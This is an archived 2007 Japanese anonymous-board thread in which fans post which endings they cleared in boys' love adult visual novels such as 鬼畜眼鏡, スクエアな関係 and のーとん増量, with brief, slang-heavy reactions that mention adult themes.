ファナティカ 誓いの剣・旅立ちED

やっとフルコンプ&念願の主カプ挿入を見れた!
辿り着くまでどこまでヘタレなんだ先生orzとか思ったが
自分的には旅立ちより誓いの方がしっくり、すっきり
同ブランドの別ゲは真相ED好きだったんだが
こっちは唐突感が少しばかりあって、ちとだけもにょ
トーラスへの期待感は増してしまったけど、全年齢…or2

でも楽しかったし面白かった
ここで言うのもなんだが、積みゲスレで後押ししてくれた姉さんたちありがとう
地雷だなんだと何年も放置したのが馬鹿みたいだ
食わず嫌いは損をすると気付いた一作だった

95 :いけない名無しさん:2007/09/16(日) 17:10:22 ID:???
バーデー

愛情ルートの崇史・和也END
愛情ルートの和也・椿END

よく調べずに買ったんだけど、
トゥルーエンドの固定カプ以外の組み合わせは幸せそうじゃない・・・
和也と椿のラブラブが一番楽しみだったのにorz
どうしたって辛そう
 
同じく崇史・和也ルートも鬱展開
話自体は大好きだけど、固定カプが決まってるって悲しい・・・
FDは固定カプ以外もラブラブらしいから、予定無かったけど買おうかな(´;ω;`)

96 :いけない名無しさん:2007/09/16(日) 17:34:33 ID:???
メサイア

煌さんトゥルークリア

終わった!
正直ちょっと…疲れた…
でも話はとても良かったし、本当にエロ(ry

勧めてくれた姐さん、促進してくれた姐さん方ありがとう!

じゃ、birdie行ってきまーす\(^o^)/

97 :いけない名無しさん:2007/09/16(日) 17:35:27 ID:???
久々にage忘れた…

98 :いけない名無しさん:2007/09/16(日) 23:43:55 ID:???
メサイア

後輩ルートBAD×2

ヘタレわんこ好きだった筈なのにイマイチ萌え切れず。
でも個人的に見たかった彼との絡みがあってテンションうp。
サブキャラにも声が欲しかったなー
隷属EDのタクトのエロさは最強。

BLなのにヴェロニカが絡んできて驚いた。
なぜアリスじゃない!
吸血鬼ルート入ったらアリスとも絡めるのかな。wktk

99 :いけない名無しさん:2007/09/17(月) 01:16:31 ID:???
鬼畜眼鏡
片桐グッドEND・バッドEND



某スレ住人じゃないが、乙女おじさん属性に目覚めてしまった
しかも泣き虫淫乱乙女おじさん萌えって…or2
怯えながらも頬を染めて、今日は…の所からは
気の毒だと思いつつ萌えまくりました、ごめんなさい
バッドENDのヤンデレっぷりにも萌え萌えしました

100 :いけない名無しさん:2007/09/17(月) 01:17:56 ID:tO94aEO6
コイビト遊戯
櫻井グッドED、バッドED

バッドは思いきり引いた・・・あれは受け付けられん_| ̄|○
先にバッド見たのでグッドに突撃する気力失せたが頑張ったところ・・・
激しく萌え!なんて奇天烈なヤツ!
こういうのに弱いんだよーーーーー(*゚∀゚)=3
で、毎度のごとくいいところでエンディング・・・。
もしやこのゲームに向いてませんか、私。。。

和泉澤ED
ああ・・・・・・・噂には聞いていたが・・・・・・・・・・・・・・_| ̄|○

残すは兄ちゃん。
頼む、兄ちゃん。後味よく終わらせてくれ・・・!

101 :いけない名無しさん:2007/09/17(月) 03:05:11 ID:tO94aEO6
コイビト遊戯
兄ちゃんグッドED、バッドED

ふむ。まだ兄ちゃんはなんとか耐えられた。ホッ。
グッドは意外と萌えが押し寄せるのに今回はそんなに波がこなかった。
和泉澤EDがこたえたか・・・。

これでコンプ!のはずが、まだCGもシーンも全部埋まってないのは何故ですか(´д`)


102 :積みゲ550:2007/09/17(月) 06:55:03 ID:???
空の森 フルコン!
小野田、隼人、悠里、岸和田、隠しキャラ真相ED、各種バッドED

真相で謎が解けてすっきりした。複雑に伏線が張られていて楽しめた!
エロメインのしかやったことなかったから、こういうボブゲもあることにすこし感動。

小野田真相  せつない。幸せになって欲しい。てかアレから花の香りってwどんだけー
岸和田×高浜 ちょwスゲーよ、成/田さん!!あえぎすぎwwwwwwww
貴志×岸和田 オヤジ受けキタ━(゚∀゚)━!!お戯れを・・ってw奥ゆかしい(*´Д`)

獣姦、3P、触手、監禁とかシュチュが豊富でお腹いっぱいすぎる!!
絡みなしだったけどおじ様たちの声優さんにサプライズ!!
後押ししてくれた姐さんありがとう!

つぎは大成学園やるぞ〜

103 :いけない名無しさん:2007/09/18(火) 01:04:50 ID:???
UTM つきいろ
レニ グッドED

本編でも一番好みの甘さだったのがレニルート。
FDだとそれがさらに甘くてたまらんかった!!
1番最初に攻略してよかった!!
次はぜひともレニ・バッドEDを迎えたい!
あいかわらず脚本が◎
ただなー。散々言われていたけどもやっぱり…うん…。
双子よ、特にセイジュよ、早く魔力を上げて立ち絵を美麗にしてくれww

104 :いけない名無しさん:2007/09/18(火) 02:07:11 ID:???
星の王女3
弁慶、継信、吉次、法皇

後ればせながら宇宙意識を初受信
男装主人公ってことで
『女だと知らずに恋心→駄目だ駄目だ彼は男なんだこの思いは封印するんだ!』
と苦悩する男どもを期待してたのに、今のところあっさりバレてーら
BL臭避けるための敬遠かな…
でも女だからこそ、限界ギリまで苦悩→女バレ→理性崩壊アーレー
なんて展開に期待してたんだけどな

でも主従いいよ主従
純情な継信テラカワユス、継信攻もみたかった!
アテルイモレで(;´Д`)となったけど、義経と弁慶の会話で目から汗がでたのは内緒だ

105 :いけない名無しさん:2007/09/19(水) 00:46:38 ID:4svs7nGZ
ばーでー鬼畜ルートいろいろ
もしこれ椿主人公の総攻めゲーなら、椿が神だったな・・・
某鬼畜ゲーにこれぐらいやってほしかったよorz
でも主人公はあの三人なんだ、あの三人が幸せになってほしいんだ、
やっぱり椿○ね



106 :いけない名無しさん:2007/09/19(水) 07:37:42 ID:rl3hzNql
玉響
そろそろ詰まってきたので攻略サイトを参考に一気にすすめるぞ(*´∀`)

透夜×遼(リバ)ED
→透夜攻めいいよいいよー。意外に攻が似合うな!
  どうしても、遼さんっていうとコチ○思い出してしまう…。

あとミニゲームクリア〜。
ほとんど運だなこれw

107 :いけない名無しさん:2007/09/19(水) 12:13:17 ID:rl3hzNql
玉響 フルコン

久瀬×俊一(リバ)ED
→掛け合いが面白いwww
  最初俊一は若干苦手なタイプかと思ってたのに
  プレイしてみたら可愛かった!
  2人の性格(整理整頓とか)がちょっと意外&逆なのも良かったなー。

夕貴BAD関連
→夕貴ここまでダークなら、襲い受じゃなくていっそのこと総攻きぼん!

リバ好きなのでかなり良かった。良ゲー。
個人的にはもっと鬼畜でも良かったな。
一本道ストーリーな部分が不評っぽいけど、スキップが早いからかあまり気にならなかった。
初めてこのメーカーのプレイしたけど、システムまわりが快適で感動。次回作にも期待。

あと、とうとう薔薇もフルコンしたー。長かった…。
金子かわいいよ金子。
最後までミニゲームがよくわからなかった。なんなんだあれw

次は鬼畜眼鏡だ!

108 :いけない名無しさん:2007/09/21(金) 01:17:48 ID:???
Love☆Drops
ユーゴ二股BAD

これ始めて見た時EDの暗さに思わずヒャッホウと叫んでしまい、
そこで自分が欝EDスキーな事に初めて気づかされた。
いやでもこれ奏本編√より萌える(*´∀`)
というかこのゲームの中で最萌√はこのEDかもしれん。



109 :age:2007/09/21(金) 03:28:40 ID:gd4bae3b
Lamento
バルドgood

やっとコンプした
なんかもうこのルートに至ってはほぼスキップしまくりだったけど
ラストが良かった

んでも主人公がの未来に関して、いまいちハッピーエンドと言い切れない
とかいうオチ(全部共通だったけど)はイラネだった

110 :いけない名無しさん:2007/09/21(金) 03:29:37 ID:???
名前欄に入れてもーた
暑さと眠さと長さで朦朧と

111 :いけない名無しさん:2007/09/21(金) 16:22:57 ID:???
スクエアな関係
蒼井×小早川ED
はじめてだったので
小早川オンリーで対西田を狙ってやってたはずがいつの間にか…
小早川かわいいよ小早川`ァ'`ァ'`ァ'`ァ(;´Д`)'`ァ'`ァ'`ァ'`ァ
しかし同居してる部屋で盛大にやって音漏れは大丈夫か?ww

112 :いけない名無しさん:2007/09/21(金) 18:32:47 ID:???
スクエアな関係
小早川×西田ED
西田×小早川ED
カプとしては小西が好みなんだけど
話は西小のほうが断然良かった。ゴチでした

113 :積みゲ580:2007/09/22(土) 00:38:58 ID:???
PLEASURE☆
太一END、観月END

伝説の「筋肉の動きを〜」をやっと見た。
本人達が至って真面目なのが面白過ぎるw

乱交に次ぐ乱交で感覚が素敵に麻痺してきた☆
ツンデレを略奪愛したかと思えば、おかっぱに懐かれ、
主将といいムードになったかと思えば不良に襲いかかられてたYO☆
最後まで誰のENDになるかわからなくてドキドキ☆なんだZE☆

114 :いけない名無しさん:2007/09/22(土) 12:58:25 ID:???
>>113
なんというシンクロw
同じく裸バスケ
クリスエンド…?

いや、なんでか藤木と城之内がくっついてた
このゲームわけわかめwでも好き^^

ちょっと城之内×藤木に萌えたのは内緒…
てか主人公空気www

115 :いけない名無しさん:2007/09/22(土) 15:05:51 ID:???
咎狗の地
源泉、ケイスケ、リンルート

一番興味なかったのに、源アキに萌え死んだw
最初の印象からずっと、アキラは攻めじゃないと
モヤモヤするって思ってたけど、受けで正解だったよ
「俺の首締めんかい」のあたりから萌えが加速加速
喘ぎも禿げる

ケイスケのもすごかった。つか本当に「アキラァ」って言っててワロタw
ビル?の中でケイスケをおさえるとこは泣いた。アキラすご
最後本当に幸せそうで良かったー

リンのEDはリンアキフラグ?って思ったwリンかっこよすぎ

かっこいいというか、男らしい受けがこんなにも萌えるとは思わなかった。
徹夜でやって良かったなー

これ終わったら恐らくLamentoも買う。楽しみだ!

116 :いけない名無しさん:2007/09/23(日) 02:32:28 ID:???
スクエアな関係
小早川×西田ED

思っていた印象より小早川が若かったのと西田が可愛かった件
そして周りの励ましっぷりが予想外に萌えた(特に岸田)

117 :116:2007/09/23(日) 02:35:52 ID:???
うは岸田って誰だよorz
岸本です岸本。

118 :いけない名無しさん:2007/09/23(日) 03:25:04 ID:???
lamento アサトED

フルコンプ。アサトルートが一番感動した。シナリオ長くて何度もだれてしまったけど、もう最後にはそれすらも吹っ飛んでしまった。
中の人含め、製作者の方々、素晴らしい作品をありがとうございました。

119 :いけない名無しさん:2007/09/23(日) 08:25:06 ID:???
スクエア 小早川×蒼井ED

ヘタレ攻イヤッホォォォゥ
妄想早漏自己完結ごちそうさまでした。
蒼井が男前だったので片思いで終わらずに済んだと思いました。

120 :いけない名無しさん:2007/09/23(日) 13:42:54 ID:???
スクエア 小早川×西田ED

システムに慣れないまま岸本×西田を目指してたら速攻引越し先決めちゃって
急いでやりなおして、このEDへ。
アレ?蒼井×西田を狙ったんだけどな?(・∀・)

でもなんだろう。ちょっとあっさりしてない?
バーデーと比べるからか、最近濃いソフトをやりすぎてたからか?

一言。
元ホストの冷凍庫にアイスがなかった時の反応には笑い萌えた。
次は目指せ、スロプー!

121 :いけない名無しさん:2007/09/23(日) 20:20:55 ID:tzkjmXon
スクエア 西田×小早川ED

(;´Д`)ハァハァ西田攻めイイ!

バッド?エンドの2人が可愛かった
そのコーヒー私も飲みたい

122 :いけない名無しさん:2007/09/23(日) 22:26:50 ID:???
スクエア 蒼井×西田ED 岸本×西田ED

萌えの波キタ━━━(゜∀゜)━━━!!!!!!
ビバ視点選択!やっと面白さがわかってきましたよ。
岸本も最初キライキャラ認定だったのに・・・・・・・。
4人とも大好きだーっ!この勢いじゃ連休でコンプしちゃいそうだ。


123 :積みゲ580:2007/09/23(日) 22:58:55 ID:???
裸バスケコンプ

ぶっ飛んだ設定で面白かった☆
スチル集めに苦労して攻略サイトのお世話になりました。
ルート分岐が複雑過ぎで自力じゃ無理だ。

>>114
ちょっとどころか城之内と藤木に一番萌えたなんて言えないw

124 :123:2007/09/23(日) 23:02:03 ID:???
age忘れ

バカップルは食傷気味だったけど、涼とクリスは見たかった。


125 :いけない名無しさん:2007/09/24(月) 00:12:08 ID:???
スクエア 小早川×蒼井ED

小早川がヘタレすぎて笑ったw
すれ違いっぷりがかわいくて萌えたけど
それにしても蒼井の受け顔のエロさはなんだ
萌えすぎてたまらん
次もスロプー受け目指すのケテーイ

126 :いけない名無しさん:2007/09/24(月) 23:45:39 ID:???
スクエア 岸本×蒼井ED
・・・あれ?
この流れだと逆を予想してたんだが、予想外に蒼井がカワユスで萌えた

127 :いけない名無しさん:2007/09/26(水) 19:56:50 ID:???
鬼畜眼鏡 もうどーにでもなあれENDクリア。
こ れ は ひ ど い
良い意味でひどい。w

128 :いけない名無しさん:2007/09/26(水) 20:11:33 ID:R5uEbgGK
薔薇ノ木

陵辱BAD  すげーゲームだなこりゃ。エロい。ドイツ語わかんねーよorz
苦手かと思った絵もすぐ慣れた。歴史物では珍しく雰囲気出てるの(・∀・)イイ!!

陵辱GOOD センセ実は超美形じゃないか!髪下ろしてたほうがいいよ!

純愛GOOD 土田ルート・・・のはずがいつのまにか金子ルートへ。正直スマンカッタ
でも萌えたから幸せ(*´Д`)

寝る前に手記を読もう

129 :いけない名無しさん:2007/09/28(金) 05:02:54 ID:UCRFIXZc
スクエアな〜
*西田×蒼井
*蒼井×西田
*岸本×小早川

受けがみんなカワユス(*´Д`)

130 :いけない名無しさん:2007/09/28(金) 12:18:45 ID:r276eThJ
スクエア
岸本×小早川
蒼井×岸本

どのCPもイイ(*´Д`)
ビバ総リバゲー

131 :いけない名無しさん:2007/09/28(金) 19:19:59 ID:hfdqvRoF
のーとん増量
のーとたち
 囲碁が案外いい味だしてた、響みたいに個別欲しかったな
 ノノ、ちょ、おまww
 響はツンデレ……泣いた

 のーとんベストにも泣いた
 人型良過ぎる、この√の明もがんがっていて好きだ

132 :いけない名無しさん:2007/09/29(土) 19:01:09 ID:MWngoSsF
同じくのーとん増量

のーとんベストED


意外と健気なのーとんに涙
しかしのーとん√なのに響のドSさに萌えたー(*´Д`)

133 :いけない名無しさん:2007/09/30(日) 02:22:52 ID:???
スクエア
岸本×西田
西田×岸本
エチよりもお互いの、一人で居る時の描写に禿げ萌えました

134 :いけない名無しさん:2007/09/30(日) 20:31:27 ID:TmnW7jcy
薔薇

土田×真弓
すげーよかった。切ない。・゚・(ノД`)・゚・。
土田いい奴・・・

水川×要
これも切なかった・・・

金子×真弓、要×あずさ
主に真弓の性格の悪さにワロタ

絵柄で放置してあったんだけど、やってよかったよ
積みゲスレの人たちありがとう

135 :いけない名無しさん:2007/10/01(月) 19:10:59 ID:???
コイビト

大貴×裕太(BADEND)

うわあぁぁぁ!!!大貴こえぇぇぇ!!(TAT)

でも大好きです( ´艸`)

136 :いけない名無しさん:2007/10/01(月) 21:47:25 ID:7m7oMCXf
スクエア
岸本×小早川
小早川×岸本

うは、攻め視点だと受けがどっちもかわいすぐる
リバってこんなにいいものだったのですね
次はどのカプいこうかワクワク

137 :いけない名無しさん:2007/10/01(月) 22:47:56 ID:???
薔薇
水火

途中から泣けてきて仕方がないんだが
何故だろう

138 :いけない名無しさん:2007/10/01(月) 23:01:02 ID:0q2Bjgf/
薔薇仲間がいた

土田×金子
金子の涙にクルものがあった・・・あ〜金子好きだ

水川×あずさ
あずさはこのルートが一番好きかも。
心理描写が秀逸だわ。

139 :いけない名無しさん:2007/10/01(月) 23:13:21 ID:L8Wv3hDn
鬼畜眼鏡(2週目)

ハーレムED。
やばすぎるwww
あきルートのはずが逸れてしまったw

140 :いけない名無しさん:2007/10/01(月) 23:59:07 ID:L/QsUFoe
のーとん増量 フルコンプ

響絡みは切なくなるやら萌えるやらで忙しかった
五井とか響ルート欲しいなあ
人型のーとんむちゃくちゃ萌えた

ファンブック買って来よう… λ...

141 :いけない名無しさん:2007/10/03(水) 01:25:02 ID:TxnT2Gjx
同じくのーとん増量
人型のーとん思いの外かっこいいし可愛いしやられた…雨場面の健気さに泣いた
前作ではまさかのーとんのこんな面が見られるとは思ってなかったから凄い満足

142 :いけない名無しさん:2007/10/03(水) 05:00:42 ID:???
のーとん増量コンプ

のーとん可愛いよのーとん!
欲を言えばノート達にも個別ベストEDが欲しかったなー
今後の展開に期待。

143 :いけない名無しさん:2007/10/03(水) 05:47:34 ID:???
姐さん方に引き続き、のーとん増量中をフルコンプ

人型のーとんで大いに萌えを補充させてもらいますた。
上の姐さんと同じく、各ノートとのEDがあれば(ノノは別だけど…) もっと良かったけど、個人的には五井×のーとんも見てみたい…。

144 :いけない名無しさん:2007/10/03(水) 11:03:29 ID:???
同じくのーとん増量フルコンプ
のーとんベストより響エンドを先に見たのは失敗だった
頭の中は響響響だよ…
しかし一番悶えたのはのーとんと耳掻きだ!たまらんっ!

145 :いけない名無しさん:2007/10/04(木) 00:45:56 ID:yw/pT/HI
積みゲ指定崩し、楽園行

指定のアフロと気になってた二志クリア
全体のやりとりが面白すぎwバルスwwwww
ただもちっとアフロとの絡みが欲しかった、サミシス
ラブ要素は薄いけど話のテンポが良くて楽しい

一番甘い奴は誰じゃー!

146 :いけない名無しさん:2007/10/04(木) 02:30:49 ID:???
のーとん増量
のーとんと永遠に☆
耳掻きはぁはぁ/ ヽァ/ ヽァ / \ァ/ \ァ466なgjpm2あjmkjふiあじgjgjkこo


花町
巽+兄×しゅりの3p end
ずいきくわえながら歩くなんてエロース
ああああああ二重人格と結ばれたいのにいいいい

147 :いけない名無しさん:2007/10/05(金) 17:43:34 ID:9tkFp5nP
鬼畜眼鏡
御堂×克哉 克哉×片桐

御堂のツンデレは、最初からツンデレ担当だと分かっちゃいたけど萌えた
声優詳しくないから御堂の声が途中から野●原ひろしを思い出してしまった orz

みんなデレ入りだすと頬染めまくりワロタ

148 :いけない名無しさん:2007/10/06(土) 01:39:23 ID:???
神無ノ鳥
イカル×章仁

レンジャク狙いで進めてたらいつのまにか章仁ルートに入ってた
だが全く構わない、章仁さんドンピシャで萌えでございました
章仁かわいいよ章仁おおおおおおおおおおおおお
満足した^^^^

149 :いけない名無しさん:2007/10/06(土) 02:58:26 ID:AVIrljqN
鬼畜眼鏡
克哉×本多 太一×克哉 克哉×秋紀 ザクロ

克哉×本多は思ったよりツボじゃないかも…って矢先に好きシチュキタ──(゚∀゚)──ッ!!
往生際の悪い受けハァハァ
魅惑の果実も大変萌えた

ついでにとあるBADでMr.Rが私の気持ちを代弁したwww
良く分かってるじゃないか、Mr.Rwww

150 :いけない名無しさん:2007/10/06(土) 19:03:21 ID:???
修業旅行
春木受け、春木鴨川

正直この為だけに買ったと言っていい
そして萌えすぎて吐きそうになった\(^o^)/
何だこのいちいちキュンキュンする言動はあああ
そして高野はもっと春木に手を出せば(ry
春木可愛いよ南部カッコ可愛いよはあはあ
南春萌えー!!!

ハンクス
新倉表裏、和志裏

主人公カッコ良すぎワロタ
こういう攻め主人公を求めていました…結婚してください

あと中の人、ネ申。


総括:主攻め万歳\(^o^)/

151 :いけない名無しさん:2007/10/07(日) 00:12:54 ID:???
UTMつきいろ
レニ×アシェ

杉崎さんが大好きだ!!

152 :いけない名無しさん:2007/10/07(日) 01:37:31 ID:vddwKG/W
鬼畜眼鏡を一昨日からプレイ。

眼鏡克哉×須原 BEST・BAD×2  

御堂×ノーマル克哉 BEST・BAD×2

ノーマル克哉×太一 BAD×2

御堂ルートのノマ克の可愛さは異常w
あと御堂のノーマルルートでの御堂さんの可愛さ尋常じゃない。どんな酷いことを言ってもお前(克哉)が好きなんだvvvって言っているようにしか聞こえないw

他ルートも頑張るか。

153 :いけない名無しさん:2007/10/07(日) 12:17:33 ID:???
鬼畜眼鏡
エンド28 五十嵐ルート刺殺されED
本人に刺されるんならまだしもなぜ?


154 :いけない名無しさん:2007/10/07(日) 12:47:00 ID:???
修業旅行
滝受け

滝も可愛いなー…
というかいちいちキャラの掛け合いに萌える
エロシーンでの睫倍増ワロタ
回数は一回だけどツボにくるエロだ…

さ、もう一回春木受けいこう

155 :いけない名無しさん:2007/10/07(日) 16:58:51 ID:7UQe+Mya
コイビト遊戯
芳賀×裕太
ベストEDみました。
何か…とてもSMAPのlion heartが歌いたくなった

156 :いけない名無しさん:2007/10/07(日) 18:18:30 ID:???
ハンクス
いつき裏、和志表

裏ハーレムにいけねーw/^o^\
いつき裏の店長の黒さが大好きです
顔も声も性格も学歴も才能も全てがツボ
理想の攻め主人公です

しかしつくづく裏メインのゲームですねw
いやそこが最高なんだけど

157 :いけない名無しさん:2007/10/08(月) 02:56:51 ID:ufoGTxj9
鬼畜眼鏡
本多×克哉 ハーレム ザクロ

本多攻めルートのBADの選択肢は妙にキリキリした
謝りに行くとか何この妙にリアリティのある選択肢
御堂に怒られて、仕事での辛い思い出が走馬燈のように駆けめぐったよ… orz
あとハッピーEDの直前の選択肢間違えるGOOD?EDの克哉がちょっと好みだw

さー御堂受けでコンプ目指すぜ

158 :いけない名無しさん:2007/10/08(月) 15:12:26 ID:???
ハンクス
裏ハーレム

100%攻略様の通りに進みようやく!
店長半端ねえwwwww
何度でもいう、店長カッコ良すぎワロタ
中の人 ネ申

さ、裏もうひと通りやるか

159 :いけない名無しさん:2007/10/08(月) 15:13:20 ID:???
age忘れた

160 :いけない名無しさん:2007/10/08(月) 16:00:20 ID:7PFwJA51
メサイア

遼太ノーマルEND
あれ?そっちが攻めるの?
しかし拓人はエロエロだなぁ。

煌トゥルーEND
遼太が「…葛城先輩!」って言ったとこで
目から汁がでたんだぜ。

攻略キャラ2人だけどほんと対照的だったな。
FD楽しみだ。

161 :いけない名無しさん:2007/10/08(月) 16:25:56 ID:uSUZ5GOY

http://www.youtube.com/watch?v=_1gyjMT7cM0

http://www.nicovideo.jp/watch/sm1193133

http://www.nicovideo.jp/watch/sm1212019

http://jp.youtube.com/watch?v=KCGpVN70sWM

http://www.nicovideo.jp/watch/sm1196008

http://www.nicovideo.jp/watch/sm981519

http://www.nicovideo.jp/watch/sm678333


162 :いけない名無しさん:2007/10/09(火) 01:08:04 ID:l3XWu3dS
鬼畜眼鏡
克哉×御堂

御堂は受けも攻めも可愛かった
腹一杯だよ本当にありがとうございました

163 :いけない名無しさん:2007/10/11(木) 01:28:57 ID:???
スクエア
小早川×西田
西田×小早川
岸本×蒼井
蒼井×岸本
小早川×蒼井

駄目だ小早川がかわいすぐるw
今んとこ一番萌えたのは蒼井×岸本
ツンデレばんじゃーい。
僕とおれの使い分けイイ…!

164 :いけない名無しさん:2007/10/11(木) 19:48:07 ID:???
修業旅行
瀬永受け

途中まで瀬永攻めかとオモタw
つか可愛いなオイ、ちょっとびっくりだよ
あと主人公がSになってて吹いた
テラカッコヨスwwwww

春木受け
何回やってんだ自分…
好きすぎて死にそう
喘ぎが無いのは残念だが…

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)